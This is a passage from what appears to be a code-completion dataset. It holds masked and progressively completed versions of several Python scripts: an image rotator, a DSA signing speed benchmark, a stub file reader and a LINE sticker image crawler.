for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir, degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
|
flexible
|
{
"blob_id": "df3208a00f7a5dd1ddd76542ac0de85762cc45ab",
"index": 7236,
"step-1": "<mask token>\n\n\nclass Task(object):\n <mask token>\n <mask token>\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-2": "<mask token>\n\n\nclass Task(object):\n <mask token>\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-3": "<mask token>\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-4": "from __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,\n 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n def __init__(self, input_dir, output_dir, **kwargs):\n # Get keyword arguments.\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n\n # Check arguments.\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n\n # Process files and directories.\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir, degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
from Crypto.PublicKey import DSA
from Crypto.Signature import DSS
from Crypto.Hash import SHA256
import os
import time
kB = 1024 # 1kB
with open('small_file.txt', 'wb') as f:
f.write(os.urandom(kB))
mB = 10485760 # 1GB
with open('large_file.txt', 'wb') as f:
f.write(os.urandom(mB))
Begin = time.time()
key = DSA.generate(2048)
with open("public_key.pem", "wb") as f:
f.write(key.publickey().export_key())
f.close()
End = time.time()
print("Key Generation Time: ", End-Begin)
def DSA_2048(filename,key):
with open(filename, 'rb') as f:
message = f.read()
hash_obj = SHA256.new(message)
signer = DSS.new(key, 'fips-186-3')
signature = signer.sign(hash_obj)
# Load the public key
f = open("public_key.pem", "r")
hash_obj = SHA256.new(message)
pub_key = DSA.import_key(f.read())
verifier = DSS.new(pub_key, 'fips-186-3')
# Verify the authenticity of the message
try:
verifier.verify(hash_obj, signature)
print ("The message is authentic.")
except ValueError:
print ("The message is not authentic.")
Begin=time.time()
DSA_2048('small_file.txt',key)
End=time.time()
print("Time taken for DSA_2048 with 1 kb file: ",End-Begin)
if End-Begin != 0:
print("DSA_2048 speed for 1 kb file: ",1024/(End-Begin),"bytes/sec")
Begin=time.time()
DSA_2048('large_file.txt',key)
End=time.time()
print("Time taken for DSA_2048 with 10 mb file: ",End-Begin)
if End-Begin != 0:
print("DSA_2048 speed for 1 kb file: ",10485760/(End-Begin),"bytes/sec")
exit()
|
normal
|
{
"blob_id": "d24bbfc3587a2a79891a11e00ec865498c01c286",
"index": 2101,
"step-1": "<mask token>\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\n<mask token>\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\n<mask token>\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\n<mask token>\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\n<mask token>\nDSA_2048('small_file.txt', key)\n<mask token>\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\n<mask token>\nDSA_2048('large_file.txt', key)\n<mask token>\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-3": "<mask token>\nkB = 1024\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\nmB = 10485760\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\nBegin = time.time()\nDSA_2048('small_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\nBegin = time.time()\nDSA_2048('large_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-4": "from Crypto.PublicKey import DSA\nfrom Crypto.Signature import DSS\nfrom Crypto.Hash import SHA256\nimport os\nimport time\nkB = 1024\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\nmB = 10485760\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\nBegin = time.time()\nDSA_2048('small_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\nBegin = time.time()\nDSA_2048('large_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-5": "from Crypto.PublicKey import DSA\nfrom Crypto.Signature import DSS\nfrom Crypto.Hash import SHA256\nimport os\nimport time\n\nkB = 1024 # 1kB\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\n\nmB = 10485760 # 1GB\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\n\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open(\"public_key.pem\", \"wb\") as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint(\"Key Generation Time: \", End-Begin)\n\ndef DSA_2048(filename,key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n # Load the public key\n f = open(\"public_key.pem\", \"r\")\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n # Verify the authenticity of the message\n try:\n verifier.verify(hash_obj, signature)\n print (\"The message is authentic.\")\n except ValueError:\n print (\"The message is not authentic.\")\n\nBegin=time.time()\nDSA_2048('small_file.txt',key)\nEnd=time.time()\nprint(\"Time taken for DSA_2048 with 1 kb file: \",End-Begin)\nif End-Begin != 0:\n print(\"DSA_2048 speed for 1 kb file: \",1024/(End-Begin),\"bytes/sec\")\n\nBegin=time.time()\nDSA_2048('large_file.txt',key)\nEnd=time.time()\nprint(\"Time taken for DSA_2048 with 10 mb file: \",End-Begin)\nif End-Begin != 0:\n print(\"DSA_2048 speed for 1 kb file: \",10485760/(End-Begin),\"bytes/sec\")\nexit()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Reader:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Reader:
@staticmethod
def read_file(file_path):
return ''
|
flexible
|
{
"blob_id": "8c51b2c06f971c92e30d6b2d668fdd2fd75142d2",
"index": 4846,
"step-1": "<mask token>\n",
"step-2": "class Reader:\n <mask token>\n",
"step-3": "class Reader:\n\n @staticmethod\n def read_file(file_path):\n return ''\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config.read('crawler.config')
<|reserved_special_token_0|>
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config = configparser.ConfigParser()
config.read('crawler.config')
directoryLocation = os.getcwd() + '\\img'
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
headers = ('User_Agent',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
)
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
from urllib import request
from urllib import error
from urllib.request import urlretrieve
import os, re
from bs4 import BeautifulSoup
import configparser
from apng2gif import apng2gif
config = configparser.ConfigParser()
config.read('crawler.config')
directoryLocation = os.getcwd() + '\\img'
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
headers = ('User_Agent',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
)
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
from urllib import request
from urllib import error
from urllib.request import urlretrieve
import os, re
from bs4 import BeautifulSoup
import configparser
from apng2gif import apng2gif
config = configparser.ConfigParser()
config.read('crawler.config')
# 下載儲存位置
directoryLocation = os.getcwd() + '\\img'
# 設置要爬的頁面
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
# 設置User-Agent
headers = ("User_Agent",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0")
# 自定義opener
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + "\\" + downLoadType + "\\" + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + "\\" + str(count + 1) + ".png"
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
# if animationUrl download animation png ,else download imageurl
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode("utf-8", "ignore")
rule = '(https.*sticker@2x\.png)' # 正則匹配
ruleEmoji = '(https.*/\d{3}\.png)'
title = getTitle(content)
title = re.sub('\s', '', title)
title = re.sub('[\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content) # 獲取圖片列表
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content) # 小表情規則
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print("已全部下載完成")
|
flexible
|
{
"blob_id": "7bcdd6c5c6e41b076e476e1db35b663e34d74a67",
"index": 1885,
"step-1": "<mask token>\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\n<mask token>\n",
"step-2": "<mask token>\nconfig.read('crawler.config')\n<mask token>\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
"step-3": "<mask token>\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\ndirectoryLocation = os.getcwd() + '\\\\img'\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\nheaders = ('User_Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'\n )\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
"step-4": "from urllib import request\nfrom urllib import error\nfrom urllib.request import urlretrieve\nimport os, re\nfrom bs4 import BeautifulSoup\nimport configparser\nfrom apng2gif import apng2gif\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\ndirectoryLocation = os.getcwd() + '\\\\img'\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\nheaders = ('User_Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'\n )\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
"step-5": "from urllib import request\nfrom urllib import error\nfrom urllib.request import urlretrieve\nimport os, re\nfrom bs4 import BeautifulSoup\nimport configparser\nfrom apng2gif import apng2gif\n\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\n# 下載儲存位置\ndirectoryLocation = os.getcwd() + '\\\\img'\n# 設置要爬的頁面\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\n\n# 設置User-Agent\nheaders = (\"User_Agent\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\")\n# 自定義opener\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + \"\\\\\" + downLoadType + \"\\\\\" + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + \"\\\\\" + str(count + 1) + \".png\"\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n # if animationUrl download animation png ,else download imageurl\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode(\"utf-8\", \"ignore\")\n rule = '(https.*sticker@2x\\.png)' # 正則匹配\n ruleEmoji = '(https.*/\\d{3}\\.png)'\n title = getTitle(content)\n title = re.sub('\\s', '', title)\n title = re.sub('[\\W_]+', '', title)\n\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content) # 獲取圖片列表\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content) # 小表情規則\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n\n print('第', count + 